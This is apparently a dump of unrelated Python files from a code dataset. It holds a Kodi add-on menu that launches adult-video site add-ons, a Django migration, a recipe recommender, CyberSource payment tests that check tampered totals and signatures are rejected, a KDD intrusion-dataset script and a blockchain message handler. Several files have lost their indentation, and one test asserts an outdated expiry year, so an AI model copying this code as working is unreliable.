li.setInfo(type='video', infoLabels={'plot': 'www.streamingporn.xyz'})
li.setArt({'fanart': xxxmenu.getAddonInfo('fanart')})
xbmcplugin.addDirectoryItem(handle=addon_handle, url=url,
listitem=li, isFolder=False)
url = build_url({'mode': 'clean', 'foldername': 'Clear [COLOR blue][B]XXX MENU[/B][/COLOR] cache'})
li = xbmcgui.ListItem('Clear [COLOR blue][B]XXX MENU[/B][/COLOR] cache', iconImage=recycle_icon)
li.setInfo(type='video', infoLabels={'plot': 'Clear [COLOR blue][B]XXX MENU[/B][/COLOR] cache'})
li.setArt({'fanart': xxxmenu.getAddonInfo('fanart')})
xbmcplugin.addDirectoryItem(handle=addon_handle, url=url,
listitem=li, isFolder=False)
xbmcplugin.endOfDirectory(addon_handle)
elif mode[0] == 'xxxmenu':
xbmc.executebuiltin('Container.Refresh')
elif mode[0] == 'pandamovies':
xbmc.executebuiltin('RunAddon(plugin.video.pandamovies.pw)')
elif mode[0] == 'mangoporn':
xbmc.executebuiltin('RunAddon(plugin.video.mangoporn.net)')
elif mode[0] == 'streamingporn':
xbmc.executebuiltin('RunAddon(plugin.video.streamingporn.xyz)')
elif mode[0] == 'sexkino':
xbmc.executebuiltin('RunAddon(plugin.video.sexkino.to)')
elif mode[0] == 'pornkino':
xbmc.executebuiltin('RunAddon(plugin.video.pornkino.to)')
elif mode[0] == 'sexuria':
xbmc.executebuiltin('RunAddon(plugin.video.sexuria.com)')
elif mode[0] == 'clean':
tmp_path = xbmc.translatePath("special://userdata/addon_data/plugin.video.xxxmenu/tmp/").decode("utf-8")
try:
shutil.rmtree(tmp_path, ignore_errors=True)
except:
pass
xbmc.executebuiltin('Notification([COLOR blue][B]XXX MENU[/B][/COLOR], Cache successfully cleared., 5000, %s)' % (addon_icon))
xbmc.executebuiltin('Container.Refresh')
|
5,121 | 8cdd7646dbf23259e160186f332b5cb02b67291b | # Generated by Django 2.2.3 on 2019-07-11 22:04
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('app1', '0002_property_details'),
]
operations = [
migrations.AlterField(
model_name='property_details',
name='flat_type',
field=models.CharField(choices=[('1', '1BHK'), ('2', '2BHK'), ('3', '3BHK')], max_length=20),
),
migrations.AlterField(
model_name='property_details',
name='possession',
field=models.CharField(choices=[('1', 'ready to move'), ('2', 'work on progress')], max_length=20),
),
migrations.AlterField(
model_name='property_details',
name='price_range',
field=models.CharField(choices=[('1', '$5000'), ('2', '$15,000'), ('3', '$25,000'), ('4', '$40,000'), ('5', '$50,000')], max_length=50),
),
]
|
5,122 | 5c8de06176d06c5a2cf78ac138a5cb35e168d617 | import os
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.decomposition import TruncatedSVD
from sklearn.metrics.pairwise import cosine_similarity
def get_df_4_model(user_id, n_recommendations = 20000):
    '''Build the latent-feature DataFrames used by the recommendation model.

    Returns (latent_content, latent_rating, user_rated_recipe_ids): content
    latents come from CountVectorizer + TruncatedSVD over recipe metadata,
    rating latents from SVD over the user/recipe rating matrix. Both are
    also persisted under data/latents/.
    '''
    # First the data needs to be loaded
    print('Generating dataframe for recommendation model')
    recipes_df_raw = pd.read_csv("data/preprocessed/recipe_pp_20201118_1206.csv")#.sample(n=n_recommendations, random_state=1)
    reviews_df_raw = pd.read_csv("data/preprocessed/review_pp_20201118_1206.csv")
    print(f'{len(recipes_df_raw.ingredients)} recipes are being considered for recommendation')
    # !! currently the df is way to big, so we need to take a sample, but ensure that the recipes the user likes are used for finding similarities later
    # For this I will create a sample df without user recipes and concatenate the a df with only user liked recipes
    user_rates =list(reviews_df_raw[reviews_df_raw.user_id == user_id].recipe_id) # generate a list of user rated recipes
    sample_df_no_user = recipes_df_raw[~recipes_df_raw.recipe_id.isin(user_rates)].sample(n=n_recommendations, random_state=1)
    recipe_df_w_user = recipes_df_raw[recipes_df_raw.recipe_id.isin(user_rates)]
    recipes_df_user = pd.concat([sample_df_no_user, recipe_df_w_user], axis=0)
    merge_df = pd.merge(recipes_df_user[['recipe_id', 'metadata']], reviews_df_raw, on="recipe_id", how="right").dropna()
    recipes_df = merge_df[['recipe_id', 'metadata']].groupby(by="recipe_id").first().reset_index()
    reviews_df = merge_df.drop(['metadata'], axis="columns").reset_index()
    print(len(user_rates))
    print(sample_df_no_user.shape)
    #Using CountVectorizer to encode metadata into column
    count = CountVectorizer(stop_words='english')
    count_matrix = count.fit_transform(recipes_df['metadata'])
    #Create a new dataframe count_df with the vectors you get from this count transformation.
    count_df = pd.DataFrame(count_matrix.toarray(), index=recipes_df.recipe_id.tolist())
    #reduce dimensionality
    n_red = 250 # reduction factor
    svd = TruncatedSVD(n_components=n_red)
    latent_df = svd.fit_transform(count_df)
    n = n_red
    latent_df = pd.DataFrame(latent_df[:,0:n], index=recipes_df.recipe_id.tolist())
    latent_df
    # start recommendin similar recipes on the basis of user ratings (item-item collaborative filtering
    #### -> old: ratings = reviews_df.pivot(index = 'recipe_id', columns ='user_id', values = 'rating').fillna(0)
    #
    ratings1 = pd.merge(recipes_df[['recipe_id']], reviews_df, on="recipe_id", how="right")
    ratings = ratings1.pivot(index = 'recipe_id', columns ='user_id', values = 'rating').fillna(0)
    svd = TruncatedSVD(n_components=800)
    latent_df_2 = svd.fit_transform(ratings)
    index_list = reviews_df.groupby(by="recipe_id").mean().index.tolist()
    latent_df_2 = pd.DataFrame(latent_df_2, index=index_list)
    # Persist the latents so later runs / debugging can reload them.
    latent_df.to_csv(f'data/latents/latent_content.csv', index=True)
    latent_df_2.to_csv(f'data/latents/latent_rating.csv', index=True)
    return latent_df, latent_df_2, user_rates
def get_one_recommendation(recipe_id, latent_1, latent_2, n_recommendations):
    """Score every recipe against *recipe_id* and return the top matches.

    Combines content-based (latent_1) and collaborative (latent_2) cosine
    similarities into a 'hybrid' score and returns the n_recommendations
    best rows, with the recipe ids in a 'recipe_id' column.
    """
    anchor_content = np.asarray(latent_1.loc[recipe_id]).reshape(1, -1)
    anchor_rating = np.asarray(latent_2.loc[recipe_id]).reshape(1, -1)
    content_sim = cosine_similarity(latent_1, anchor_content).reshape(-1)
    collab_sim = cosine_similarity(latent_2, anchor_rating).reshape(-1)
    scores = pd.DataFrame(
        {
            'content': content_sim,
            'collaborative': collab_sim,
            'hybrid': (content_sim + collab_sim) / 2.0,
        },
        index=latent_1.index,
    )
    scores = scores.sort_values('hybrid', ascending=False)
    return scores.head(n_recommendations).reset_index().rename(columns={"index": "recipe_id"})
def get_user_recommendations(user_id, n_recommendations = 500):
    '''Get recommendations for one user: score every recipe the user rated
    and sum the per-recipe hybrid similarity scores.'''
    # !!!!!!!!!! this function still assumes the user ONLY liked recipes
    # !!!!!!!!!! No dislikes are considered so far!
    latent_1, latent_2, recipe_list = get_df_4_model(user_id)#, n_recommendations)
    # One similarity frame per rated recipe (content/collaborative/hybrid columns).
    recommendations = [get_one_recommendation(i, latent_1, latent_2, n_recommendations) for i in recipe_list]# actual_list]
    #concetenate the list to a big df
    recommendations_df=pd.concat(recommendations)
    # sum the scores using groupby
    grouped_recommendations= recommendations_df.groupby(by="recipe_id").sum().sort_values(by="hybrid", ascending=False)
    return grouped_recommendations
    #return recipe_list
def get_superuser_recommendation(n_recommendations=100):
    # Demo entry point: recommendations for a fixed user, limited to the
    # first 10 of their rated recipes to keep runtime manageable.
    user_id = 424680
    latent_1, latent_2, recipe_list = get_df_4_model(user_id, n_recommendations)
    recipe_list = recipe_list[0:10]
    recommendations = [get_one_recommendation(i, latent_1, latent_2, n_recommendations) for i in recipe_list]# actual_list]
    #concetenate the list to a big df
    recommendations_df=pd.concat(recommendations)
    # sum the scores using groupby
    grouped_recommendations= recommendations_df.groupby(by="recipe_id").sum().sort_values(by="hybrid", ascending=False)
    print(f'The recommendation results are based on {len(recipe_list)} recipes the user liked or disliked')
    return grouped_recommendations[0:30]
if __name__ == "__main__":
    # Smoke-run: score recommendations for the hard-coded demo user.
    result = get_superuser_recommendation(n_recommendations=4000)
    print('Here are the top results for the user:')
    print(result)
|
5,123 | 9155b3eed8ac79b94a033801dbf142392b50720b | from bs4 import BeautifulSoup
from cybersource.constants import CHECKOUT_BASKET_ID, CHECKOUT_ORDER_NUM, CHECKOUT_SHIPPING_CODE, CHECKOUT_ORDER_ID
from cybersource.tests import factories as cs_factories
from decimal import Decimal as D
from django.core import mail
from django.core.urlresolvers import reverse
from mock import patch
from oscar.core.loading import get_class, get_model
from oscar.test import factories
from random import randrange
from rest_framework.test import APITestCase
import datetime
import requests # Needed for external calls!
Basket = get_model('basket', 'Basket')
Product = get_model('catalogue', 'Product')
Order = get_model('order', 'Order')
class BaseCheckoutTest(APITestCase):
    """Shared helpers for CyberSource checkout integration tests.

    NOTE: do_cybersource_post performs a real HTTP POST to the CyberSource
    test endpoint, so these tests require network access.
    """
    fixtures = ['cybersource-test.yaml']

    def create_product(self, price=D('10.00')):
        # Build a product with a USD stock record so it can be purchased.
        product = factories.create_product(
            title='My Product',
            product_class='My Product Class')
        record = factories.create_stockrecord(
            currency='USD',
            product=product,
            num_in_stock=10,
            price_excl_tax=price)
        factories.create_purchase_info(record)
        return product

    def do_add_to_basket(self, product_id, quantity=1):
        # POST to the basket API to add the product to the session basket.
        url = reverse('api-basket-add-product')
        data = {
            "url": reverse('product-detail', args=[product_id]),
            "quantity": quantity
        }
        return self.client.post(url, data)

    def do_get_basket(self):
        # Fetch (and implicitly create) the session basket.
        url = reverse('api-basket')
        return self.client.get(url)

    def do_sign_auth_request(self, basket_id=None, data=None):
        # Request the signed CyberSource auth form for the basket, then merge
        # in test card/billing details; returns (cybersource_url, form_data).
        if data is None:
            data = {
                "guest_email": "herp@example.com",
                "basket": reverse('basket-detail', args=[basket_id]),
                "shipping_address": {
                    "first_name": "fadsf",
                    "last_name": "fad",
                    "line1": "234 5th Ave",
                    "line4": "Manhattan",
                    "postcode": "10001",
                    "state": "NY",
                    "country": reverse('country-detail', args=['US']),
                    "phone_number": "+1 (717) 467-1111",
                }
            }
        url = reverse('cybersource-sign-auth-request')
        res = self.client.post(url, data, format='json')
        self.assertEqual(res.status_code, 200)
        next_year = datetime.date.today().year + 1
        cs_data = {
            'card_type': '001',
            'card_number': '4111111111111111',
            'card_cvn': '123',
            'card_expiry_date': '12-{}'.format(next_year),
            'bill_to_forename': 'Testy',
            'bill_to_surname': 'McUnitTest',
            'bill_to_address_line1': '234 5th Ave',
            'bill_to_address_line2': 'apt 5',
            'bill_to_address_city': 'Manhattan',
            'bill_to_address_state': 'NY',
            'bill_to_address_postal_code': '10001',
            'bill_to_address_country': 'US',
            'bill_to_phone': '17174671111',
        }
        # Non-editable/signed fields must be sent back exactly as issued.
        for field in res.data['fields']:
            if not field['editable'] or field['key'] not in cs_data:
                cs_data[field['key']] = field['value']
        cs_url = res.data['url']
        return cs_url, cs_data

    def do_cybersource_post(self, cs_url, cs_data):
        # Real call to CyberSource; scrape the returned form and relay it
        # to our reply handler, as the browser redirect would.
        res = requests.post(cs_url, cs_data)
        self.assertEqual(res.status_code, 200)
        soup = BeautifulSoup(res.content, 'html.parser')
        form_data = {}
        for element in soup.find_all('input'):
            form_data[element['name']] = element['value']
        # We have the data from cybersource, send it to our cybersource callback
        url = reverse('cybersource-reply')
        return self.client.post(url, form_data)

    def check_finished_order(self, number, product_id, quantity=1):
        # Assert a single fully-authorised order exists with the expected
        # line, payment event, source, transaction, and confirmation email.
        self.assertEqual(Order.objects.all().count(), 1)
        order = Order.objects.get()
        self.assertEqual(order.number, number)
        lines = order.lines.all()
        self.assertEqual(lines.count(), 1)
        line = lines[0]
        self.assertEqual(line.quantity, quantity)
        self.assertEqual(line.product_id, product_id)
        payment_events = order.payment_events.filter(event_type__name="Authorise")
        self.assertEqual(payment_events.count(), 1)
        self.assertEqual(payment_events[0].amount, order.total_incl_tax)
        payment_sources = order.sources.all()
        self.assertEqual(payment_sources.count(), 1)
        self.assertEqual(payment_sources[0].currency, order.currency)
        self.assertEqual(payment_sources[0].amount_allocated, order.total_incl_tax)
        self.assertEqual(payment_sources[0].amount_debited, D('0.00'))
        self.assertEqual(payment_sources[0].amount_refunded, D('0.00'))
        transactions = payment_sources[0].transactions.all()
        self.assertEqual(transactions.count(), 1)
        self.assertEqual(transactions[0].txn_type, 'Authorise')
        self.assertEqual(transactions[0].amount, order.total_incl_tax)
        self.assertEqual(transactions[0].status, 'ACCEPT')
        self.assertEqual(transactions[0].log_field('req_reference_number'), order.number)
        self.assertEqual(transactions[0].token.card_last4, '1111')
        self.assertEqual(len(mail.outbox), 1)
class CheckoutIntegrationTest(BaseCheckoutTest):
"""Full Integration Test of Checkout"""
    def test_checkout_process(self):
        """Full checkout process using minimal api calls"""
        product = self.create_product()
        res = self.do_get_basket()
        self.assertEqual(res.status_code, 200)
        basket_id = res.data['id']
        res = self.do_add_to_basket(product.id)
        self.assertEqual(res.status_code, 200)
        # Sign the auth request, round-trip through CyberSource, and expect
        # the reply handler to redirect (302) to the success page.
        cs_url, cs_data = self.do_sign_auth_request(basket_id)
        res = self.do_cybersource_post(cs_url, cs_data)
        self.assertEqual(res.status_code, 302)
        self.check_finished_order(cs_data['reference_number'], product.id)
def test_add_product_during_auth(self):
"""Test attempting to add a product during the authorize flow"""
product = self.create_product()
res = self.do_get_basket()
self.assertEqual(res.status_code, 200)
basket_id = res.data['id']
# Adding a product here should succeed
res = self.do_add_to_basket(product.id)
basket1 = res.data['id']
self.assertEqual(res.status_code, 200)
cs_url, cs_data = self.do_sign_auth_request(basket_id)
# Adding a product here should go to a new basket, not the one we're auth'ing
res = self.do_add_to_basket(product.id)
self.assertEqual(res.status_code, 200)
basket2 = res.data['id']
self.assertNotEqual(basket1, basket2)
res = self.do_cybersource_post(cs_url, cs_data)
self.assertEqual(res.status_code, 302)
self.check_finished_order(cs_data['reference_number'], product.id)
# Adding a product here should go to basket2, not basket1
res = self.do_add_to_basket(product.id)
self.assertEqual(res.status_code, 200)
basket3 = res.data['id']
self.assertEqual(basket2, basket3)
def test_pay_for_nothing(self):
"""Test attempting to pay for an empty basket"""
res = self.do_get_basket()
self.assertEqual(res.status_code, 200)
basket_id = res.data['id']
data = {
"guest_email": "herp@example.com",
"basket": reverse('basket-detail', args=[basket_id]),
"shipping_address": {
"first_name": "fadsf",
"last_name": "fad",
"line1": "234 5th Ave",
"line4": "Manhattan",
"postcode": "10001",
"state": "NY",
"country": reverse('country-detail', args=['US']),
"phone_number": "+1 (717) 467-1111",
}
}
url = reverse('cybersource-sign-auth-request')
res = self.client.post(url, data, format='json')
self.assertEqual(res.status_code, 406)
def test_manipulate_total_pre_auth(self):
"""Test attempting to manipulate basket price when requesting an auth form"""
product = self.create_product()
res = self.do_get_basket()
self.assertEqual(res.status_code, 200)
basket_id = res.data['id']
res = self.do_add_to_basket(product.id)
self.assertEqual(res.status_code, 200)
self.assertEqual(res.data['total_incl_tax'], '10.00')
url = reverse('cybersource-sign-auth-request')
data = {
"guest_email": "herp@example.com",
"basket": reverse('basket-detail', args=[basket_id]),
"total": "2.00", # Try and get $10 of product for only $2
"shipping_address": {
"first_name": "fadsf",
"last_name": "fad",
"line1": "234 5th Ave",
"line4": "Manhattan",
"postcode": "10001",
"state": "NY",
"country": reverse('country-detail', args=['US']),
"phone_number": "+1 (717) 467-1111",
}
}
res = self.client.post(url, data, format='json')
self.assertEqual(res.status_code, 406)
def test_manipulate_total_during_auth(self):
"""Test attempting to manipulate basket price when requesting auth from CyberSource"""
product = self.create_product()
res = self.do_get_basket()
self.assertEqual(res.status_code, 200)
basket_id = res.data['id']
res = self.do_add_to_basket(product.id)
self.assertEqual(res.status_code, 200)
self.assertEqual(res.data['total_incl_tax'], '10.00')
cs_url, cs_data = self.do_sign_auth_request(basket_id)
cs_data['amount'] = '2.00'
res = requests.post(cs_url, cs_data)
self.assertEqual(res.status_code, 403)
def test_free_product(self):
"""Full checkout process using minimal api calls"""
product = self.create_product(price=D('0.00'))
res = self.do_get_basket()
self.assertEqual(res.status_code, 200)
basket_id = res.data['id']
res = self.do_add_to_basket(product.id)
self.assertEqual(res.status_code, 200)
cs_url, cs_data = self.do_sign_auth_request(basket_id)
self.assertEqual(cs_data['amount'], '0.00')
res = self.do_cybersource_post(cs_url, cs_data)
self.assertEqual(res.status_code, 302)
self.check_finished_order(cs_data['reference_number'], product.id)
class CSReplyViewTest(BaseCheckoutTest):
    """Test the CybersourceReplyView with fixtured requests"""

    def prepare_basket(self):
        """Setup a basket and session like SignAuthorizePaymentFormView would normally

        Returns (session, basket_id, order_number).
        """
        product = self.create_product()

        res = self.do_get_basket()
        self.assertEqual(res.status_code, 200)
        basket_id = res.data['id']

        res = self.do_add_to_basket(product.id)
        self.assertEqual(res.status_code, 200)

        # Mimic the session state the sign-auth view would have set up
        session = self.client.session
        session[CHECKOUT_BASKET_ID] = basket_id
        session[CHECKOUT_ORDER_NUM] = str(randrange(1000000, 9999999))
        session[CHECKOUT_SHIPPING_CODE] = 'free-shipping'
        session.save()
        return session, basket_id, session[CHECKOUT_ORDER_NUM]

    @patch('cybersource.signals.order_placed.send')
    def test_invalid_signature(self, order_placed):
        """Invalid signature should result in 400 Bad Request"""
        session, basket_id, order_number = self.prepare_basket()
        data = cs_factories.build_declined_reply_data(order_number)
        data = cs_factories.sign_reply_data(data)
        # Corrupt the signature after signing
        data['signature'] = 'abcdef'
        url = reverse('cybersource-reply')
        resp = self.client.post(url, data)
        self.assertEqual(resp.status_code, 400)
        self.assertEqual(len(mail.outbox), 0, 'Should not send email')
        self.assertEqual(order_placed.call_count, 0, 'Should not trigger signal')
        self.assertEqual(Order.objects.count(), 0, 'Should not make order')

    @patch('cybersource.signals.order_placed.send')
    def test_invalid_request_type(self, order_placed):
        """Bad request type should result in 400 Bad Request"""
        session, basket_id, order_number = self.prepare_basket()
        data = cs_factories.build_declined_reply_data(order_number)
        # NOTE(review): the trailing comma makes this value the tuple
        # ("payment",) rather than the string "payment" - looks like a typo,
        # though either way it is an invalid transaction type for this test.
        data["req_transaction_type"] = "payment",
        data = cs_factories.sign_reply_data(data)
        url = reverse('cybersource-reply')
        resp = self.client.post(url, data)
        self.assertEqual(resp.status_code, 400)
        self.assertEqual(len(mail.outbox), 0, 'Should not send email')
        self.assertEqual(order_placed.call_count, 0, 'Should not trigger signal')
        self.assertEqual(Order.objects.count(), 0, 'Should not make order')

    @patch('cybersource.signals.order_placed.send')
    def test_duplicate_transaction_id(self, order_placed):
        """Duplicate Transaction ID should result in redirect to the success page"""
        session, basket_id, order_number = self.prepare_basket()
        data = cs_factories.build_accepted_reply_data(order_number)
        data = cs_factories.sign_reply_data(data)
        url = reverse('cybersource-reply')

        self.assertEqual(order_placed.call_count, 0)
        self.assertEqual(Order.objects.count(), 0)

        # First post creates the order
        resp = self.client.post(url, data)
        self.assertRedirects(resp, reverse('checkout:thank-you'))
        self.assertEqual(order_placed.call_count, 1)
        self.assertEqual(Order.objects.count(), 1)

        # Replaying the exact same reply must not create a second order
        resp = self.client.post(url, data)
        self.assertRedirects(resp, reverse('checkout:thank-you'))
        self.assertEqual(order_placed.call_count, 1)
        self.assertEqual(Order.objects.count(), 1)

    @patch('cybersource.signals.order_placed.send')
    def test_invalid_reference_number(self, order_placed):
        """Mismatched reference number should result in 400 Bad Request"""
        session, basket_id, order_number = self.prepare_basket()
        data = cs_factories.build_accepted_reply_data(order_number + 'ABC')
        data = cs_factories.sign_reply_data(data)
        url = reverse('cybersource-reply')
        resp = self.client.post(url, data)
        self.assertEqual(resp.status_code, 400)
        self.assertEqual(order_placed.call_count, 0)
        self.assertEqual(Order.objects.count(), 0)

    @patch('cybersource.signals.order_placed.send')
    def test_missing_basket(self, order_placed):
        """Missing basket should result in 400 Bad Request"""
        session, basket_id, order_number = self.prepare_basket()
        del session[CHECKOUT_BASKET_ID]
        session.save()
        data = cs_factories.build_accepted_reply_data(order_number)
        data = cs_factories.sign_reply_data(data)
        url = reverse('cybersource-reply')
        resp = self.client.post(url, data)
        self.assertEqual(resp.status_code, 400)
        self.assertEqual(order_placed.call_count, 0)
        self.assertEqual(Order.objects.count(), 0)

    @patch('cybersource.signals.order_placed.send')
    def test_declined_card(self, order_placed):
        """Declined card should result in redirect to failure page"""
        session, basket_id, order_number = self.prepare_basket()
        data = cs_factories.build_declined_reply_data(order_number)
        data = cs_factories.sign_reply_data(data)
        url = reverse('cybersource-reply')
        resp = self.client.post(url, data)
        self.assertRedirects(resp, reverse('checkout:index'), fetch_redirect_response=False)
        self.assertEqual(len(mail.outbox), 0, 'Should not send email')
        self.assertEqual(order_placed.call_count, 0, 'Should not trigger signal')
        self.assertEqual(Order.objects.count(), 0, 'Should not make order')

    @patch('cybersource.signals.order_placed.send')
    def test_success(self, order_placed):
        """Successful authorization should create an order and redirect to the success page"""
        session, basket_id, order_number = self.prepare_basket()
        data = cs_factories.build_accepted_reply_data(order_number)
        data = cs_factories.sign_reply_data(data)
        url = reverse('cybersource-reply')

        self.assertEqual(order_placed.call_count, 0)
        resp = self.client.post(url, data)
        self.assertRedirects(resp, reverse('checkout:thank-you'))
        self.assertEqual(len(mail.outbox), 1, 'Should send email')
        self.assertEqual(order_placed.call_count, 1, 'Should trigger order_placed signal')

        # The placed order should reflect the session/basket state
        order = order_placed.call_args[1]['order']
        self.assertEqual(order.status, 'Authorized', 'Should set order status')
        self.assertEqual(order.basket.id, basket_id, 'Should use basket from session')
        self.assertEqual(order.number, order_number, 'Should use order number from CS request')

        session = self.client.session
        self.assertEquals(session[CHECKOUT_ORDER_ID], order.id, 'Should save order_id in session')

        # Payment source: allocated but not yet captured
        self.assertEqual(order.sources.count(), 1, 'Should save pPaymentSource')
        source = order.sources.first()
        self.assertEqual(source.currency, 'USD')
        self.assertEqual(source.amount_allocated, D('99.99'))
        self.assertEqual(source.amount_refunded, D('0.00'))
        self.assertEqual(source.amount_debited, D('0.00'))

        # Transaction record matches the CyberSource reply payload
        self.assertEqual(source.transactions.count(), 1, 'Should save Transaction')
        transaction = source.transactions.first()
        self.assertEqual(transaction.log.data, data)
        self.assertEqual(transaction.token.log, transaction.log)
        self.assertEqual(transaction.token.masked_card_number, 'xxxxxxxxxxxx1111')
        self.assertEqual(transaction.token.card_type, '001')
        self.assertEqual(transaction.txn_type, 'Authorise')
        self.assertEqual(transaction.amount, D('99.99'))
        self.assertEqual(transaction.reference, data['transaction_id'])
        self.assertEqual(transaction.status, 'ACCEPT')
        self.assertEqual(transaction.request_token, data['request_token'])

        # Payment event covers the full amount and the single line
        self.assertEqual(order.payment_events.count(), 1, 'Should save PaymentEvent')
        event = order.payment_events.first()
        self.assertEqual(event.amount, D('99.99'))
        self.assertEqual(event.reference, data['transaction_id'])
        self.assertEqual(event.event_type.name, 'Authorise')
        self.assertEqual(event.line_quantities.count(), 1, 'Should save PaymentEventQuantity')
        lq = event.line_quantities.first()
        self.assertEqual(lq.line, order.lines.first())
        self.assertEqual(lq.quantity, 1)
class AuthPaymentFormViewTest(BaseCheckoutTest):
    """Test the SignAuthorizePaymentFormView"""

    def prepare_basket(self):
        """Setup a basket so that we can pay for it

        Returns the basket id.
        """
        product = self.create_product()

        res = self.do_get_basket()
        self.assertEqual(res.status_code, 200)
        basket_id = res.data['id']

        res = self.do_add_to_basket(product.id)
        self.assertEqual(res.status_code, 200)
        return basket_id

    @patch('cybersource.signals.pre_build_auth_request.send')
    @patch('cybersource.signals.pre_calculate_auth_total.send')
    def test_request_auth_form_success(self, pre_calculate_auth_total, pre_build_auth_request):
        """Signing should freeze the basket, fire both signals and emit the full CS field set."""
        basket_id = self.prepare_basket()

        # Add some taxes to the basket via the pre_calculate_auth_total signal
        def add_taxes(sender, basket, shipping_address, **kwargs):
            for line in basket.all_lines():
                line.purchase_info.price.tax = D('0.42')
        pre_calculate_auth_total.side_effect = add_taxes

        # Add an extra field into the request via the pre_build_auth_request signal
        def add_a_field(sender, extra_fields, request, basket, **kwargs):
            extra_fields['my_custom_field'] = 'ABC'
        pre_build_auth_request.side_effect = add_a_field

        # Pregenerate the order number
        session = self.client.session
        session[CHECKOUT_ORDER_NUM] = '10000042'
        session.save()

        cs_url, data = self.do_sign_auth_request(basket_id=basket_id)

        # CS URL should be correct
        self.assertEqual(cs_url, 'https://testsecureacceptance.cybersource.com/silent/pay')

        # Basket ID should be stored in the session
        session = self.client.session
        self.assertEqual(session[CHECKOUT_BASKET_ID], basket_id)

        # Basket must be frozen
        basket = Basket.objects.get(id=basket_id)
        self.assertFalse(basket.can_be_edited)

        # Make sure each signal got called
        self.assertEqual(pre_calculate_auth_total.call_count, 1)
        self.assertEqual(pre_build_auth_request.call_count, 1)

        # Check response fields (note: amount includes the 0.42 tax added above)
        self.assertEquals(data['amount'], '10.42')
        self.assertEquals(data['bill_to_address_city'], 'Manhattan')
        self.assertEquals(data['bill_to_address_country'], 'US')
        self.assertEquals(data['bill_to_address_line1'], '234 5th Ave')
        self.assertEquals(data['bill_to_address_line2'], 'apt 5')
        self.assertEquals(data['bill_to_address_postal_code'], '10001')
        self.assertEquals(data['bill_to_address_state'], 'NY')
        self.assertEquals(data['bill_to_email'], 'herp@example.com')
        self.assertEquals(data['bill_to_forename'], 'Testy')
        self.assertEquals(data['bill_to_phone'], '17174671111')
        self.assertEquals(data['bill_to_surname'], 'McUnitTest')
        self.assertEquals(data['card_cvn'], '123')
        self.assertEquals(data['card_expiry_date'], '12-2017')
        self.assertEquals(data['card_number'], '4111111111111111')
        self.assertEquals(data['card_type'], '001')
        self.assertEquals(data['currency'], 'USD')
        self.assertEquals(data['customer_ip_address'], '127.0.0.1')
        self.assertEquals(data['device_fingerprint_id'], '')
        self.assertEquals(data['item_0_name'], 'My Product')
        self.assertEquals(data['item_0_quantity'], '1')
        self.assertEquals(data['item_0_sku'], basket.all_lines()[0].stockrecord.partner_sku)
        self.assertEquals(data['item_0_unit_price'], '10.42')
        self.assertEquals(data['line_item_count'], '1')
        self.assertEquals(data['locale'], 'en')
        self.assertEquals(data['my_custom_field'], 'ABC')
        self.assertEquals(data['payment_method'], 'card')
        self.assertEquals(data['reference_number'], '10000042')
        self.assertEquals(data['ship_to_address_city'], 'Manhattan')
        self.assertEquals(data['ship_to_address_country'], 'US')
        self.assertEquals(data['ship_to_address_line1'], '234 5th Ave')
        self.assertEquals(data['ship_to_address_line2'], '')
        self.assertEquals(data['ship_to_address_postal_code'], '10001')
        self.assertEquals(data['ship_to_address_state'], 'NY')
        self.assertEquals(data['ship_to_forename'], 'fadsf')
        self.assertEquals(data['ship_to_phone'], '17174671111')
        self.assertEquals(data['ship_to_surname'], 'fad')
        self.assertEquals(data['transaction_type'], 'authorization,create_payment_token')
|
5,124 | ce28330db66dcdfad63bdac698ce9d285964d288 | import pandas as pd
# Extract the 9 selected features plus the label column from the NSL-KDD
# test set and write them out as a new CSV.
SELECTED_COLUMNS = [
    "dst_host_srv_serror_rate", "dst_host_serror_rate",
    "serror_rate", "srv_serror_rate", "count", "flag",
    "same_srv_rate", "dst_host_srv_count",
    "dst_host_diff_srv_rate", "Malicious",
]

source_frame = pd.read_csv("KDDTest+.csv")
with open("test_9feats.csv", "w") as out_file:
    # Building a new DataFrame with an explicit column list keeps only the
    # selected columns (missing names would appear as NaN columns).
    reduced = pd.DataFrame(source_frame, columns=SELECTED_COLUMNS)
    reduced.to_csv(out_file, index=False, header=True, line_terminator='\n')
    print(reduced)
5,125 | 55b8590410bfe8f12ce3b52710238a79d27189a7 | import logging
from utils import Utils
from block import Block
from message import Message
from transaction import Transaction
class Response:
    """Dispatch an incoming peer message and send back the matching response.

    ``data`` is a decoded message dict; ``data['flag']`` selects the handler:
    1 = chain size query, 2 = full chain sync, 3 = new block, else = new
    transaction. Dispatch happens immediately from __init__.
    """

    def __init__(self, node, data):
        self.node = node
        self.data = data
        self.selector()

    def selector(self):
        """Route the message to the handler selected by its flag."""
        if self.data['flag'] == 1:
            self.chain_size()
        elif self.data['flag'] == 2:
            self.chain_sync()
        elif self.data['flag'] == 3:
            # NOTE(review): append_new_block is not defined on this class -
            # a flag-3 message with boolean content would raise
            # AttributeError; confirm whether a subclass provides it.
            if isinstance(self.data['content'], bool):
                self.append_new_block()
            else:
                self.new_block()
        else:
            self.new_transaction()

    def chain_size(self):
        """Reply with this node's current ledger length (flag 1)."""
        server_chain_size = self.node.get_ledger_size()
        self.return_response(1, server_chain_size)

    def chain_sync(self):
        """Reply with the full ledger serialized block-by-block (flag 2)."""
        u = Utils()
        blocks = [u.dict_to_json(block) for block in self.node.get_server_ledger()]
        self.return_response(2, blocks)

    def new_block(self):
        """Validate an announced block and append it to the ledger if valid (flag 3)."""
        b = Block()
        block = self.data['content'][0]
        if not self.node.get_server_ledger():
            # Server has no chain, cannot validate previous hash
            logging.error('{0}Peer #{1}: cannot validate blocks! Authorizing!'.format(self.node.type,self.node.index))
            self.return_response(3, block)
        else:
            if b.validate(block):
                # Broadcast acceptance (1) before appending locally
                self.node.server.write_message('announce', 1, block['index'])
                self.node.add_block(block)
                self.return_response(3, block)
            else:
                # Broadcast rejection (2); respond with empty content
                self.node.server.write_message('announce', 2, block['index'])
                self.return_response(3)

    def new_transaction(self):
        """Validate a transaction and queue it in the shared pool (flag 4)."""
        t = Transaction()
        # content is nested one level deeper than for blocks
        tx = self.data['content'][0][0]
        if t.validate(tx):
            self.node.server.shared_tx.append(tx)
            self.return_response(4, tx)
        else:
            self.return_response(4)

    def return_response(self, flag, content=None):
        """Wrap ``content`` in a response message and send it back to the peer."""
        m = Message()
        response = m.create('response', flag, [content])
        self.node.send(response)
|
5,126 | 700b0b12c75fa502da984319016f6f44bc0d52cc | /home/lidija/anaconda3/lib/python3.6/sre_constants.py |
